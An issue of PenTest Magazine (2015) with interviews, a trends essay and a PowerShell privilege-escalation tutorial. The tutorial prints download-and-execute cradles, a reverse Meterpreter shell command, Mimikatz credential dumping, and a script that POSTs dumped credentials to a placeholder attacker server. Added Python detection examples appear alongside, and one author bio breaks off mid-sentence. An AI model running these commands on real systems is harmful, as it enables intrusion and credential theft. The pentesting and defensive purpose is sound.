
ISSN 2084 - 1117 11/2015

PENETRATION TESTING AND VULNERABILITY ANALYSIS TRENDS IN 2016

INTERVIEW WITH KAI PFIESTER - FOUNDER OF BLACK CIPHER SECURITY
PRIVILEGE ESCALATION WITH POWERSHELL
IMPACT OF COMPLIANCE ON INFORMATION SECURITY
AND MORE...
Managing Editor: Anna Kondzierska
anna.kondzierska@pentestmag.com

Betatesters & Proofreaders: Sushil Verma, Ayo Tayo Balogun, Pierre-E Bouchard, John Webb, Jay Kay, Tom Updegrove, Ivan Gutierrez Agramont, Matthew Sabin, Amit Chugh, Steven Wierckx, Daniel Dieterle, Craig Thornton, Clancey McNeal, Paul Oyola, David Kosorok, Andrea Consadori, Jarvis Simpson, Elia Pinto, Daniela C

Special thanks to the Beta testers and Proofreaders who helped with this issue. Without their assistance there would not be a PenTest Magazine.

Senior Consultant/Publisher: Pawel Marciniak

CEO: Joanna Kretowicz
joanna.kretowicz@pentestmag.com

DTP: Anna Kondzierska

Publisher: Hakin9 Media Sp.z o.o. SK
02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.

Contents

I think it is a great space to be in right now and for the future: interview with Kai Pfiester, founder of Black Cipher Security   5
Future of Pentesting and its trends for 2016 and beyond, by Jaro Nemcok & Ondrej Krehel   10
Privilege escalation with PowerShell, by Jonathan H. Broche   13
Security vs. compliance and the role of the penetration tester, by Joshua Gold   20
What issues might occur in outsourcing to an SI, by Jim Hart   24
Pentesting a true art form, by Martin Brough   27
Think of security as a wheel and a never ending circle: interview with Martin Voelk, CEO of Cyber 51   29
The sword and the shield, by Tom Updegrove   32
Impact of compliance on information security, by Ayo Tayo Balogun   36

Dear PenTest Readers,
We would like to proudly present you the newest issue of PenTest Open, which is free to
download for everyone interested in the topic. We hope that you will find many interesting
articles inside the magazine and that you will have time to read all of them.

We are really counting on your feedback here!

We are approaching the end of the year, so it is time to think about the future and the year
2016. In this issue we discuss the newest tools and trends that probably will play a big role
in the coming months. You can read about privilege escalation with PowerShell and about
Cobalt Strike. Have you ever thought about what issues may occur in outsourcing to an SI? You
can read what Jim Hart has to say about it in one of the articles.

There are also two interviews with CEOs of penetration testing companies. Our first
interview is with Kai Pfiester, the founder of Black Cipher Security. We discussed the
challenges of managing your own company and the state of the industry as it is today and
in the days to come. The second interview is with Martin Voelk, the CEO of Cyber 51. We talked
about his endeavours in making security better and more available. You can't miss it!

The main aim of this issue is to present our publication to a wider range of readers. We
want to share the material we worked on and we hope we can meet your expectations.
With a free account you have access to all the teasers and open issues, but we fully believe
that you'd like to take this one step further and enjoy our publications without limits. Our
premium subscription contains access to our whole archive.

The virtual doors to our library are open for you!

We've already started preparing the next issue of PenTest, which is going to be about
Cloud Pentesting. If there is a tool you would like to write about or you are a company
which wants a professional product review - contact us!

We would also like to thank you for all your support. We appreciate it a lot. If you like this
publication you can share it and tell your friends about it! Every comment means a lot to
us.

Again special thanks to the Beta testers and Proofreaders who helped with this issue.
Without your assistance there would not be a PenTest Magazine.

Enjoy your reading,


PenTest Magazine's
Editorial Team

I think it is a great space to be in right now and for the future
interview with Kai Pfiester, founder of Black Cipher Security

KAI PFIESTER
Founder of Black Cipher Security. He holds numerous IT
security certifications such as Certified Ethical Hacker, OSWP
and Security+. As an author he has written articles on cyber
security for the NJ Law Journal, NJ Business magazine,
Burlington Regional Chamber of Commerce and several online
publications. As a speaker, he has done presentations for the
Phi Alpha Delta Law Fraternity International, NJ Society
of CPAs, and several local business organizations.

To contact Kai:
Phone: 609.284.6513
Email: k.pfiester@blackcipher.com
Web: www.blackcipher.com

[PenTest Magazine]: Can you tell us something about yourself?

[Kai Pfiester]: I have been into IT since I first got introduced to the Apple IIe in middle school. Several years
later, when I was about 10 years old, I saw the movie War Games and instantly knew I wanted
to get into cyber security at some point. Then, in the mid-90s, I saw the movies Sneakers and Hackers, which
really motivated me to get into the information security field. I started reading everything I could find, from old
issues of Phrack to 2600 to online forums and technical manuals. But back then there wasn't as much
information online as there is today.

[PT]: And now, when you are working in the field, did reality meet the expectations?

[KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born
to do. I am a chess player and I love a good challenge that forces me to think outside the box. Penetration
testing and cyber security are, in my humble opinion, some of the most challenging fields to work in, since
they are so dynamic. It is a game of constantly moving targets.

[PT]: What convinced you to establish your own company?

[KP]: I decided to start my own IT security company around the time of the Target and Home Depot
breaches. During that time period, it seemed like there was a new breach every other week or so. I came to
the conclusion that cyber-attacks are only going to continue and only going to get worse. I enjoy helping
people and love cyber security so it was a natural fit for me.

[PT]: What kind of challenges did you face while creating your company?

[KP]: There were, and still are, many challenges in starting my own company. For starters, I thought
I wouldn't have to really sell anything. With all the hacking and data breaches at the time, I sincerely believed
that other businesses would come running to me for help. However, that was not the case,
as most business owners that I encountered didn't think they were even worth a hacker's attention.
So the primary challenge for me to this day is getting business owners to realize the need for
an effective information security plan. The next big challenge for me was to deal with all the other aspects of
running your own business, such as contracts, website design, marketing, business development,
partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person and so I had to
learn all of the other stuff as I went along.

[PT]: Your company provides services for small and medium companies. Do you find more firms are
becoming aware of cyber-attacks?

[KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyber-attacks.
However, they tend to still think that it won't happen to them or that they haven't been hacked yet.
However, most are not keeping and monitoring logs, so unless there is some blatant evidence of
a breach, they have no way of knowing if they've been compromised or not.

[PT]: What do you think are challenges for firms who are between small companies and major
corporations?

[KP]: In my opinion the major challenges they face are deciding whether they need to outsource their IT
security in order to keep costs down versus having their own in-house information security team. As we all
know, if you have data and / or resources worth the attacker's attention, you will be targeted at some point.

[PT]: From your own experience, do you prefer to work with smaller or bigger companies?

[KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart of
the matter (securing their infrastructure) quickly.

[PT]: What are your general thoughts about development of cyber security market?

[KP]: I think it is a great space to be in right now and for the future. When you consider how IT
is interwoven into almost every aspect of a person's daily life, it is easy to see how crucial IT security
is and will be. From IoT to mobile apps to social media to corporate and government networks, the cyber
security market is going to thrive well into the future.

[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?

[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems to
be the best approach to truly securing things. For instance, the banking industry is seriously considering
using a person's heartbeat to authenticate before granting access to certain financial services.

[PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable
solutions. What do you think about that? Is that a move in the right direction?

[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came DVDs
and now we are streaming video directly to our screens. Passwords are in the same boat. With super-
powerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc., many
common passwords can be cracked within a week to ten days. If passwords are accompanied by some
form of two-factor authentication, the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.

[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists?
Do you find it's going to be harder to find a job in this area?

[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for
cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so
to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I don't
think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As
for the cyber security market, if you have the skills, there will always be work, especially in the government
sector.

[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near
future?

[KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers
will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part,
since humans are the ones that can make the greatest security technology in the world completely useless
by not configuring it correctly or by being social-engineered to turn it off. Leveraging PowerShell in Windows
is also a growing attack vector as it does not trip AV. So I imagine using a system's tools against itself will
also play a part in the types of attacks we see a lot of in the future.

[PT]: Following previous question, do you find tools we have are good enough to ensure complete
protection of a company?

[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is
great security awareness training available for people, so that is covered. There are also highly effective data
security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever occurs.

[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?

[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes
from single-handed experience. But the next child born into the family not only learns from their own
experience, but learns from the other child as well. So the second child's skillset develops faster than the
first child's skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and contributions.
But I think the younger generation is going to improve and build upon the current foundation and develop
tools that will be super effective in bypassing today's defense technologies.

[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?

[KP]: Never be so arrogant that you think you are unhackable or not worth an attacker's time
or attention. I once had a business lead at a certain company and after talking to the company's IT guy, he
basically told me that he had all the company's cyber security under control. At that point, I said OK and let
it be. Six weeks later I got a call from him. He was in panic mode because his network had been hacked.
They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon
further investigation it had been hacked and was turned into a spam server. After checking the timestamps
on certain files, it was determined that his network was hacked prior to, and during, the time he told me that
he had all the network's security under control and didn't need my help. True security requires humility and
constant vigilance.


Future of pentesting and its trends for 2016 and beyond
by Jaro Nemcok & Ondrej Krehel

One of the predictions for 2016 is that it will be the year of Hacking the Code. Not the
Da Vinci Code: computer code. This code contains vulnerabilities, and it is being
exploited through its underlying integrations and connections to various enterprise-
class systems.
The second prediction is that we will be seeing cybersecurity and incident
response automation. This relates to the notoriously error-prone nature of the human
beings who, despite genuine talent, create the automation and digital world we
know today.

Penetration testing is, by many, already considered to be a commodity tactic today.

To achieve the best results, a pentester needs to combine various strategies, from leveraging the power
of top-notch automated tools, a combination of manual and automated testing, writing their own tools
for new technologies, a solid knowledge of the systems attacked, as well as scripting, social
engineering, to dark web spider-intelligence, and more. Many popular penetration testing tools help
penetration testers with creating fancy-looking reports that leave a great impression (and resonate well)
with the client. Tools then combine online dark web data, perimeters, systems, and application layers
in one beautiful report with its own scoring schema. Oftentimes, the driving force
of penetration testing is a need to be in compliance with regulations instead of a genuine decision to
actually improve security.

The benefits of using automated tools are great and it is always a good idea to be equipped with the
best tools available that can help automate the work as much as possible. You could almost think of
it as a scripted set of testing attacks with payload parameters. This is where we see the industry going.
They do not have to be commercial. A great momentum exists in the open source community, including
OWASP. Of course, even with more automation, there will still be a major difference in the quality of
work between top penetration testers and an automated scan: a vulnerability scan does not equal
a pentest. The shift towards automation, however, can be a cost-efficient alternative for companies
looking to save on basic penetration testing services and a good way for any penetration testers
looking to save time and be more efficient.

9
One peculiar nightmare of automated tools is the ratio of false positives, followed by the ranking and
interpretation of findings. Humans are still needed to properly categorize and eliminate false
positives. The learning capabilities that tools provide are, however, still far from what the popular terms
machine learning and intelligence suggest.

As new tools and utilities are being introduced to help automate penetration testing tasks to a degree
that would not have been possible just a few years ago, application complexity, technologies, and
trends evolve exponentially with them.

Although automation continues to be essential for pentesters, the challenges remain the same: every
application is different, and tools will heavily depend on user direction, since they cannot understand the
context and semantic meaning, have no intuition, and cannot improvise or adjust strategy.

Pentesting strategies are now being converted from a one-shot-a-year exercise to annual programs, where
secure code review, static and dynamic, is combined with perhaps quarterly penetration tests
of targeted areas. The financial sector, in particular, considers penetration testing an annual product
rather than a one-time service. Professional firms use human intellect and tools to set up whole
cybersecurity code exploitation and development practices with an emphasis on testing components.

Effective penetration testing teams will consist of 3-5 highly trained professionals and specialists,
executing the pentest assignment with well-rehearsed scrum efficacy: communication, division of tasks,
re-prioritizing the backlog, tracking and addressing new issues, strategically re-focusing to maximize the value
of both individual and team contributions, and committing to and owning the project from start to
completion. Teams adopting lean methodologies would typically achieve a velocity of at least double
that of isolated individual contributors of the same background.

New skillsets will be required in various emerging areas of penetration testing:

Mobile devices - iOS, Android, or Windows based native applications, as well as hybrid
application assessment, will become more and more important as the use of mobile devices
gradually shifts from entertainment to business use and to processing financial and other sensitive data.

Cloud and virtualization - software-defined network technology is new and changing
rapidly, and so is its threat landscape. This will require adjusting pentesting techniques at a
matching speed.

Internet of Things, embedded systems, pentesting/reverse engineering - office and home
automation, vehicles, medical, payment, industrial control systems, switches, power converters,
circuit breakers, and other devices are being connected to networks and therefore exposed to possible
attacks. They will all need new and improved tools and approaches.

Ever evolving modern JavaScript based web applications - to assess the security of such
applications there will be a need to combine classic crawling and scanning with a web browser engine,
a JavaScript debugger, a forward/backward tracer, an unpacking/de-obfuscation snapshot comparer,
script based state/variable alerting, injecting and fuzzing.

Wireless systems - software-defined radio (SDR) based wireless security assessments, WiFi,
smart meters, wearable devices, etc. All of this will require specific tools and skillsets.

Machine learning - machine learning based anomaly detection will keep improving. Unfortunately, so do
the counter-measures.

Internal network pentesting - will be used more as companies realize that penetrating
their internal networks using social engineering is a real possibility.

Social engineering - as a part of pentesting, in the foreseeable future we don't see
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from a USB drive.

Legacy systems - remnants of an earlier era, with a plethora of well-humming but rather dated
production deployments out there, are prime examples of where pentesters are needed. These systems will
continue to require pentesting, which will not deviate greatly from currently proven methodologies, and
a skilled pentester is crucial for those precise, military-sniper-style missions.

We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be human
genius and intelligence, in-depth understanding, and efficient utilization of automated tools that
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie;
only time will show how far artificial intelligence will get and whether human genius will replace itself with
fully automated systems. Do not forget that, in the present day, it is the human hacking skillset that has so far
won the race against machines.

About the authors:

JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.

ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he has conducted a wide range of investigations, including data
breaches through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carvings, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrej's experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational efficiency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized

Privilege escalation with PowerShell
by Jonathan H. Broche

Privilege escalation is a task that proves difficult at times. In the past, one would
rely heavily on Metasploit as the full exploitation suite. With Metasploit, one
would not only be able to exploit a vulnerability but also quickly elevate privileges
with the getsystem command. However, with the landscape of cybersecurity
constantly changing, it was only a matter of time before network administrators
implemented new technological advancements that would detect and prevent
most Metasploit payloads. With one of pentesters' favorite tools now being
detected, pentesters needed to find an alternative solution.

Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.

This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.

THE WORLD OF POWERSHELL

Since its release in November of 2006 (https://en.wikipedia.org/wiki/Windows_PowerShell), PowerShell has facilitated the
jobs of many Windows administrators. With an array of methods and functionalities, PowerShell is
much more powerful and diverse than its predecessor, the command prompt. However, despite
PowerShell's diverse functionality, there is one method that catches the eyes of pentesters: the
DownloadString method.

The DownloadString method is present in PowerShell version 2.0 and forward. When used,
DownloadString downloads the contents of a webpage into a string. If the string downloaded happens
to be a PowerShell script, it can be executed. The best part? The execution runs
in memory, thus bypassing most security products and PowerShell's script execution policy.

To demonstrate the DownloadString functionality, I created a simple PowerShell script named
ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script
identifies the version of PowerShell running and runs ipconfig.

Table 1: Ipconfig.ps1 script contents

# Report the major PowerShell version, then run ipconfig
$ver = $PSVersionTable.PSVersion.Major
"You are using PowerShell version " + $ver
ipconfig

There is an error when the script is run locally, since PowerShell's execution policy is set to Restricted.
This means that no PowerShell scripts can be run.

Figure 1: PowerShell execution error

However, if the script is uploaded to a webserver and DownloadString is used, PowerShells execution
policy is bypassed.

Table 2: Example of PowerShell's DownloadString functionality

PS > IEX (New-Object Net.WebClient).DownloadString("http://gojhonny.com/pentestmag/ipconfig.ps1")

Figure 2: PowerShell DownloadString downloading and executing the ipconfig.ps1 script

Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-Mimikatz scripts. Both scripts may be found on
Matt Graeber's GitHub (https://github.com/mattifestation).

INVOKING SHELLCODE IN MEMORY


The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads like
Metasploit's reverse HTTP. The example below depicts the use of the DownloadString method to
bypass security restrictions and execute a reverse Metasploit HTTP payload in memory. The Invoke-
Shellcode script was placed on a local webserver with the IP of 192.168.146.132.

Table 3: Example of PowerShell DownloadString Invoke-Shellcode command

PS > IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/Invoke-Shellcode.ps1")
PS > Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost <ip> -Lport <port>

Figure 3: PowerShell DownloadString downloading and executing the Invoke-Shellcode script

After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.

Figure 4: Reverse HTTP shell obtained by using the Invoke-Shellcode script

OBTAINING CACHED CREDENTIALS IN MEMORY
The Invoke-Mimikatz script is a port of Benjamin Delpy's Mimikatz created by Joseph Bialek.
Mimikatz assists pentesters by obtaining and outputting cached credentials in clear text. Again, the
example below shows sample usage of the Invoke-Mimikatz script using the DownloadString method.

Table 4: Example of PowerShell DownloadString Invoke-Mimikatz command

PS > IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/Invoke-Mimikatz.ps1")
PS > Invoke-Mimikatz -DumpCreds

Figure 5: Execution of Mimikatz in memory with PowerShell DownloadString

The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
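What makes the "credentials of all systems in a domain" scenario work is that privileged accounts leave logon sessions, and with them credential material in LSASS, on every workstation or server they sign in to. The Python below is an added example, not code from the article or from CredCrack: it reads constructed Windows 4624 logon events and a constructed group snapshot and lists the member systems on which Domain Admins or Enterprise Admins have logged on with a credential-caching logon type. The set of logon types treated as caching, the group names and every host name are assumptions for the example. A short list is the goal; a tiered administration model, Protected Users membership for the accounts, and LSA protection or Credential Guard on the hosts that do appear are the usual follow-ups.

```python
"""List member systems on which privileged domain accounts have logged on
with a logon type that leaves credential material in LSASS. Added example
for this article; not code from the article or from CredCrack. The
directory snapshot and the 4624-style events below are constructed."""

# Assumption for the example: logon types whose sessions keep credential
# material on the target host. 2 Interactive, 4 Batch, 5 Service,
# 10 RemoteInteractive, 11 CachedInteractive. 3 (Network) is excluded
# because a network logon does not place the password hash on the target.
CACHING_LOGON_TYPES = {2, 4, 5, 10, 11}

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}   # assumption
DOMAIN_CONTROLLERS = {"DC01", "DC02"}                         # constructed

# Constructed group membership snapshot, as Get-ADGroupMember might export.
GROUP_MEMBERS = {
    "Domain Admins": {"ACME\\da.alice", "ACME\\da.bob"},
    "Enterprise Admins": {"ACME\\ea.root"},
    "Helpdesk": {"ACME\\jdoe"},
}

# Constructed 4624 events, reduced to the fields the check needs.
SAMPLE_LOGONS = [
    {"Computer": "DC01", "TargetDomainName": "ACME", "TargetUserName": "da.alice", "LogonType": 2},
    {"Computer": "WS-FINANCE-07", "TargetDomainName": "ACME", "TargetUserName": "da.alice", "LogonType": 10},
    {"Computer": "FS01", "TargetDomainName": "ACME", "TargetUserName": "da.bob", "LogonType": 3},
    {"Computer": "FS01", "TargetDomainName": "ACME", "TargetUserName": "ea.root", "LogonType": 5},
    {"Computer": "WS-HR-02", "TargetDomainName": "ACME", "TargetUserName": "jdoe", "LogonType": 2},
    {"Computer": "WS-FINANCE-07", "TargetDomainName": "ACME", "TargetUserName": "da.bob", "LogonType": 2},
]

def privileged_accounts(group_members=GROUP_MEMBERS, groups=PRIVILEGED_GROUPS):
    """Flatten the privileged groups into a lower-cased DOMAIN\\user set."""
    accounts = set()
    for group in groups:
        accounts |= {member.lower() for member in group_members.get(group, ())}
    return accounts

def exposed_hosts(events, privileged, dcs=DOMAIN_CONTROLLERS):
    """Return {host: [privileged accounts with caching logons on it]}.

    Domain controllers are skipped: privileged logons there are expected,
    and LSASS on a DC holds every account's secrets regardless."""
    exposure = {}
    for e in events:
        account = (e["TargetDomainName"] + "\\" + e["TargetUserName"]).lower()
        if account not in privileged or e["LogonType"] not in CACHING_LOGON_TYPES:
            continue
        if e["Computer"] in dcs:
            continue
        exposure.setdefault(e["Computer"], set()).add(account)
    return {host: sorted(accounts) for host, accounts in exposure.items()}

def worst_first(exposure):
    """Hosts ordered by how many privileged accounts they expose."""
    return sorted(exposure, key=lambda h: (-len(exposure[h]), h))

if __name__ == "__main__":
    exposure = exposed_hosts(SAMPLE_LOGONS, privileged_accounts())
    for host in worst_first(exposure):
        print(host, exposure[host])
```

Run against real data, the events would come from the Security log of each host or from a SIEM, and the group snapshot from the directory; the network logon on FS01 is deliberately left out of the result, since a type 3 logon is what a correctly tiered administrator produces when touching a file server.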

AUTOMATING PRIVILEGE ESCALATION WITH CREDCRACK
Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.

CredCrack was created and released by myself, Jonathan Broche, in August of 2015 (http://blog.gojohnny.com/201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and
with the online community. CredCrack has two main functionalities: share enumeration and credential
harvesting.

Table 5: CredCrack's help menu

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Once domain user credentials have been compromised, it is recommended to use CredCrack's share
enumeration functionality to identify systems the compromised user has administrative access to.

The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided. Systems that grant read/write access to their administrative share (C$) indicate that
the user has local administrative access.

Figure 6: Enumerating share access with CredCrack

After using the share enumeration functionality, the pentester would create a list of systems with
administrative access and feed them into CredCrack's credential harvesting functionality.

CredCrack's credential harvesting works by executing the Invoke-Mimikatz script using
PowerShell's DownloadString method against the provided systems. Victims will execute Invoke-Mimikatz
and send the credentials over an HTTP POST request back to the pentester's system.

Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems

Below is the initial PowerShell script victims will be executing:

Table 6: PowerShell script CredCrack will execute on victims

IEX (New-Object Net.WebClient).DownloadString('http://<pentester_web_server>/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -DumpCreds;
$request = [System.Net.WebRequest]::Create('http://<pentester_web_server>/creds.php');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();

Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.
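A defender's counterpart to the script in Table 6, as an added example that is not part of CredCrack or of the original article: it scores PowerShell script block log entries (Microsoft-Windows-PowerShell/Operational, event ID 4104, whose ScriptBlockText field records the script as it was executed) against the traces that cradle leaves behind, namely Invoke-Expression of a DownloadString result, the Invoke-Mimikatz and -DumpCreds names, and a WebRequest whose method is set to POST, and aggregates the score per host. The sample events, host names, URLs, indicator weights and the alert threshold are all constructed for the example.

```python
"""Score PowerShell script block log text for the download-cradle / HTTP POST
pattern. Example code added for this article, not CredCrack code. Input model
(an assumption): tuples of (event_id, host, ScriptBlockText)."""
import re
from typing import Dict, List, Tuple

# Constructed sample events; hosts and URLs are made up for the example.
SAMPLE_EVENTS: List[Tuple[int, str, str]] = [
    (4104, "ws01", "Get-ChildItem C:\\Users | Sort-Object Name"),
    # The harvesting script from the article, minus a few lines.
    (4104, "ws02",
     "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1');"
     "$creds = Invoke-Mimikatz -DumpCreds;"
     "$request = [System.Net.WebRequest]::Create('http://10.0.0.5/creds.php');"
     "$request.Method = \"POST\";"
     "$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);"),
    # A hand-rolled POST on its own: suspicious but not conclusive.
    (4104, "ws03",
     "$r = [System.Net.WebRequest]::Create('http://intranet/upload');"
     "$r.Method = 'POST';"),
    # Fetching text without executing it: low weight.
    (4104, "ws04",
     "$wc = New-Object Net.WebClient; $wc.DownloadString('http://intranet/banner.txt')"),
    # Module-logging event (4103), not a script block: ignored by analyze().
    (4103, "ws02", "CommandInvocation(Get-Date): \"Get-Date\""),
]

# (indicator name, weight, pattern over ScriptBlockText); weights are assumptions.
INDICATORS = [
    # Invoke-Expression of remotely fetched text within a single statement.
    ("download_cradle", 3,
     re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b[^;]*\.DownloadString\s*\(")),
    # Any in-memory fetch of script text.
    ("remote_script_fetch", 1, re.compile(r"(?i)\.DownloadString\s*\(")),
    # Well-known credential dumping entry points.
    ("credential_dump", 4, re.compile(r"(?i)Invoke-Mimikatz|-DumpCreds\b|sekurlsa")),
    # WebRequest object whose method is then set to POST (results leaving the host).
    ("webrequest_post", 2,
     re.compile(r"(?i)WebRequest\]::Create\(.*?\.Method\s*=\s*[\"']POST[\"']", re.S)),
]
ALERT_THRESHOLD = 3  # assumption: tune against the environment's baseline


def score_script(text: str) -> Dict[str, int]:
    """Return {indicator: weight} for every indicator found in one script block."""
    return {name: weight for name, weight, pat in INDICATORS if pat.search(text)}


def analyze(events) -> Dict[str, dict]:
    """Aggregate indicator hits per host across all 4104 events.

    Each indicator counts once per host, so a host that runs the whole cradle
    in one block or spread over several blocks scores the same."""
    hosts: Dict[str, dict] = {}
    for event_id, host, text in events:
        if event_id != 4104:
            continue  # only script block events carry the full script text
        entry = hosts.setdefault(host, {"score": 0, "indicators": []})
        for name, weight in score_script(text).items():
            if name not in entry["indicators"]:
                entry["indicators"].append(name)
                entry["score"] += weight
    return hosts


def alerts(events, threshold: int = ALERT_THRESHOLD) -> List[str]:
    """Hosts whose aggregated score reaches the threshold, sorted by name."""
    return sorted(h for h, e in analyze(events).items() if e["score"] >= threshold)


if __name__ == "__main__":
    for host, entry in sorted(analyze(SAMPLE_EVENTS).items()):
        print(f"{host}: score={entry['score']} indicators={entry['indicators']}")
    print("alert on:", alerts(SAMPLE_EVENTS))
```

Script block logging must be enabled (the "Turn on PowerShell Script Block Logging" Group Policy setting under Windows PowerShell) before any 4104 events exist to feed this. The patterns match the form shown in Table 6 and are a starting point rather than a complete rule set; the per-host aggregation is what makes a download followed by a POST from the same machine stand out even when neither part is conclusive on its own.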

Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester

After all victims have finished the execution of Mimikatz, CredCrack will search for any matches against
the domain administrator's list to see if a domain administrator account was obtained and if so, output
the account's credentials.

Figure 9: CredCrack output

Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.

CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!

About the author:

JONATHAN H. BROCHE
A computer security professional with over ten years of hands-on experience in the
Information Technology field. He specializes in penetration testing, social
engineering and system security configurations. Jonathan has a bachelor's degree
in Information Technology from Florida International University with concentrations
in application development and UNIX administration. Additionally, he has earned
certifications from Offensive Security (OSCE, OSCP, OSWP) and the Global
Information Assurance Council (GSEC).
Jonathan is also a researcher, writer and speaker. His latest contribution to the
industry is the renowned CredCrack tool which gained international attention upon
its release. Jonathan is an active member of several security-related organizations
